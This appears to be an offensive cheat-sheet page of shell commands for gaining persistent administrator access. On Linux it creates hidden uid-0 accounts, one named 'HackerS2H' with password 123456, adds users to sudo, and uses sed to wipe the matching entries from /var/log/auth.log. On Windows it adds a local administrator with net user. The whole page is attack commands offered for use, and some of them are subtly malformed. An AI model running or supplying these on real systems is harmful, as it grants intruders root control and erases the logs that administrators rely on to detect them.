Skip to content

Privilege Escalation

On The Box

Linux

Add user directly to /etc/passwd, /etc/shadow, /etc/group and /etc/gshadow.

useradd -u 0 -e -g 0 <username>
passwd <username>
# -or-
USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here"
&& sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 -- 
non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' 
/var/log/auth.log
# -or-
adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456

Modify user groups by

sudo usermod -aG sudo username
# -or-
sudo gpasswd -a username sudo

Windows

net user <username> <password> /add
net localgroup administrators <username> /add